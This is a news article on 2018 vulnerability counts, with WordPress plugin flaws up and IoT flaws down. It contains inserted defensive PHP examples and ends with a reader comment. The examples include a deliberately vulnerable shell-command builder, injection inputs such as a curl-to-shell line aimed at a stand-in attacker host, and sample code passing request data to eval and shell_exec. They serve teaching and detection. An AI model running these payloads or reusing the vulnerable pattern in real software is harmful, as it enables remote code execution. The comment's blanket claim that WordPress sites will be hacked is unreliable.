
Web Vulnerabilities Up, IoT Flaws Down

The number of flaws found in WordPress and its plugins has tripled since 2017, while Internet of Things vulnerabilities dropped significantly, according to data collected by Imperva.

The total number of vulnerabilities reported by researchers jumped to 17,142 in 2018, more than 21% above the previous year, driven in part by the large number of flaws found in Web applications and application programming interfaces (APIs).

The popular content management system (CMS) WordPress had the most reported vulnerabilities, with 542. WordPress has a large ecosystem of more than 54,000 plugins, and those third-party plugins accounted for almost all (98%) of the WordPress security issues found by researchers last year, according to Web security firm Imperva, which published its findings in a report this week.

That extensibility and broad adoption make WordPress attractive to Web developers but also to online attackers, says Nadav Avital, research manager for threat analytics at Imperva.

"These make WordPress a lucrative asset that many hackers set their eyes upon—any security hole they may be able to find and exploit can lead to a mass infection," he says.

On the Rise

According to the National Vulnerability Database, the number of publicly disclosed vulnerabilities overall (not just in Web apps) rose more than 127% in 2017, to 14,649, after more than a decade in which the annual count varied between 5,000 and 8,000. The growth in online applications, wider use of open-source components, and more rigorous security testing are all likely contributing factors.

"It is somewhat expected that the overall number of vulnerabilities rises year after year," Imperva's Avital says. "Each year there are more products—new and legacy—to check and more sophisticated tools to check them with."

"We definitely see a lot of growth in terms of the number of vulnerabilities associated with modern applications," says David Habusha, vice president of products at WhiteSource. "The attackers are focused on front-end facing Web servers, content management platforms, and Internet of Things."

While WordPress accounted for more than 500 vulnerabilities, another content management system, Drupal, had two of the most attacked vulnerabilities, Imperva found.

Broken down by vulnerability class, flaws in which untrusted input is interpreted as code or commands by another component, commonly called injection flaws, were the largest group, with 3,294, according to the report. Remote command execution accounted for the largest share of those, with 1,980.
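The injection and remote-command-execution figures above are abstract, so here is the shape such a finding usually takes in a WordPress plugin. This is an added illustration written for this article, not code from the Imperva report or from any real plugin; the "pingtool" name and its two functions are hypothetical. It builds the shell command a plugin admin page might run against a user-supplied host, once unsafely and once with an allowlist check plus shell quoting, and shows what each does with constructed injection attempts.

```php
<?php
// Added example for this article; not code from the Imperva report or from
// any real WordPress plugin. "pingtool" and both functions are hypothetical.
// Scenario: a plugin admin page that runs `ping` against a host the user
// typed in. This is the shape of most command-injection findings in plugins.

declare(strict_types=1);

// VULNERABLE: request data is concatenated into the shell command unchanged,
// so "example.com; id" makes the shell run `id` after the ping.
function pingtool_command_vulnerable(string $host): string
{
    return 'ping -c 1 ' . $host;
}

// HARDENED: accept only a syntactically valid hostname (an allowlist check),
// then shell-quote it anyway so that a later relaxation of the check cannot
// reopen the hole. Returns null when the input must be rejected.
function pingtool_command_hardened(string $host): ?string
{
    $host = trim($host);
    if ($host === '' || strlen($host) > 253) {
        return null;
    }
    // FILTER_VALIDATE_DOMAIN + FILTER_FLAG_HOSTNAME (PHP >= 7.0) rejects
    // ';', '|', '$(', whitespace and other non-hostname characters.
    if (filter_var($host, FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME) === false) {
        return null;
    }
    return 'ping -c 1 ' . escapeshellarg($host);
}

// Constructed inputs: one legitimate host and two injection attempts.
$inputs = [
    'example.com',
    'example.com; id',
    '$(curl http://attacker.example/x.sh | sh)',
];

foreach ($inputs as $in) {
    printf("input:      %s\n", $in);
    printf("vulnerable: %s\n", pingtool_command_vulnerable($in));
    printf("hardened:   %s\n\n", pingtool_command_hardened($in) ?? '(rejected)');
}
```

Neither function executes anything; the point is the command string that would reach `shell_exec()`. In a real plugin the handler would also gate the request with WordPress's own `current_user_can()` and `check_admin_referer()` so that only an authorised, nonce-protected request reaches the command at all; the validation above is what stops the request from becoming a shell of its own.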

IoT Vulns Dropped

While Web applications appear to be increasingly targeted, another major focus of vulnerability research, the Internet of Things, fared comparatively well in 2018, according to the Imperva report. The number of vulnerabilities found in IoT devices and software fell to its lowest level in three years.

Growing interest in developing security standards and best practices has likely prompted vendors to invest more in security, Imperva's Avital says.

"While fewer vulnerabilities were found in IoT products, it does not mean that IoT is safe from cyberattackers," he says. "While new IoT products may be more secure, many IoT vendors still don't push security updates and if they did, it isn't clear how to update or if they can even be deployed as some devices cannot be taken offline."

Companies need to automate their vulnerability scanning and use agile development methodologies to fix security issues as early in the software-development cycle as possible, says Dan Cornell, chief technology officer for the Denim Group, a software-security firm.

"I think we are still at the saturation point, where organizations have a much greater focus on the detection of vulnerabilities over the remediation of vulnerabilities," Cornell says. "People are still doing a lot of testing, but they still are not fixing enough."

To fix vulnerabilities and reduce the number of issues that actually make it into production, code-checking tools run during development can help developers take a greater role in securing the software as it is written.
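As an added example of the kind of cheap, automated check the paragraph above has in mind (this is not a tool from Imperva, WhiteSource or Denim Group), the script below tokenises a PHP plugin file and reports every call to a command- or code-execution sink, marking as "high" the calls whose argument list references a request superglobal directly. It is a flat token scan, not taint analysis: data that passes through a local variable first is only reported as "review", which the constructed sample deliberately shows. The sample handler and the `wp_pingtool_handler` name are hypothetical.

```php
<?php
// Added example for this article; not a tool from Imperva, WhiteSource or
// Denim Group. A minimal pre-commit/CI style check: tokenise a plugin file,
// report calls to execution sinks, and flag those that pass a request
// superglobal straight in. Flat token scan only (no data-flow tracking).

declare(strict_types=1);

const SINK_FUNCTIONS = ['shell_exec', 'exec', 'system', 'passthru', 'popen', 'proc_open', 'eval'];
const TAINTED_VARS   = ['$_GET', '$_POST', '$_REQUEST', '$_COOKIE', '$_SERVER', '$_FILES'];

/** @return array<int, array{line:int, sink:string, tainted:string[], severity:string}> */
function find_sink_calls(string $source): array
{
    $tokens   = token_get_all($source);
    $count    = count($tokens);
    $findings = [];

    for ($i = 0; $i < $count; $i++) {
        $tok = $tokens[$i];
        if (!is_array($tok)) {
            continue; // single-character tokens such as '(' or ';'
        }
        // eval is a language construct (T_EVAL); the rest are plain T_STRING names.
        $isSink = $tok[0] === T_EVAL
            || ($tok[0] === T_STRING && in_array(strtolower($tok[1]), SINK_FUNCTIONS, true));
        if (!$isSink) {
            continue;
        }
        // Ignore method calls ($obj->exec()), static calls (Foo::exec()) and
        // definitions (function exec()): inspect the previous non-whitespace token.
        $p = $i - 1;
        while ($p >= 0 && is_array($tokens[$p]) && $tokens[$p][0] === T_WHITESPACE) {
            $p--;
        }
        $prev = $p >= 0 ? $tokens[$p] : null;
        if (is_array($prev) && in_array($prev[0], [T_OBJECT_OPERATOR, T_DOUBLE_COLON, T_FUNCTION], true)) {
            continue;
        }
        // Must be followed by '(' (skipping whitespace) to be a call.
        $j = $i + 1;
        while ($j < $count && is_array($tokens[$j]) && $tokens[$j][0] === T_WHITESPACE) {
            $j++;
        }
        if ($j >= $count || $tokens[$j] !== '(') {
            continue;
        }
        // Walk the argument list to its matching ')' and collect superglobals.
        $depth   = 0;
        $tainted = [];
        for ($k = $j; $k < $count; $k++) {
            $t = $tokens[$k];
            if ($t === '(') {
                $depth++;
            } elseif ($t === ')') {
                if (--$depth === 0) {
                    break;
                }
            } elseif (is_array($t) && $t[0] === T_VARIABLE && in_array($t[1], TAINTED_VARS, true)) {
                $tainted[] = $t[1];
            }
        }
        $tainted    = array_values(array_unique($tainted));
        $findings[] = [
            'line'     => $tok[2],
            'sink'     => $tok[1],
            'tainted'  => $tainted,
            'severity' => $tainted === [] ? 'review' : 'high',
        ];
    }
    return $findings;
}

// Constructed sample of a plugin handler (hypothetical, not a real plugin).
$sample = <<<'PHP'
<?php
function wp_pingtool_handler() {
    $host = $_POST['host'];
    $raw  = shell_exec('ping -c 1 ' . $_POST['host']);   // direct superglobal: high
    $also = system('ping -c 1 ' . $host);                 // via variable: only "review"
    eval($_GET['code']);                                  // direct superglobal: high
    $this->exec('not a sink');                            // method call: ignored
    echo esc_html($raw);
}
PHP;

foreach (find_sink_calls($sample) as $f) {
    printf("line %d: %s(%s) [%s]\n", $f['line'], $f['sink'], implode(', ', $f['tainted']), $f['severity']);
}
```

Run against the constructed sample it reports `shell_exec` on line 4 and `eval` on line 6 as high, `system` on line 5 as review, and skips the method call on line 7. The line 5 miss is the built-in limitation of a token scan: anything more than a single assignment away from the superglobal needs real taint tracking, which is what a commercial static-analysis tool adds; a check like this is still worth wiring into a pre-commit hook or CI job because it costs nothing and catches the most common plugin pattern before it ships.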


This is a sinkhole of a web page provider - almost all of our internet page issues come from WordPress sponsored sites and I really think it should be avoided whenever possible if not just abolished entirely. There is no trust in their controls and/or features. Assume if you sponsor through this one, your data will be hacked in short order.

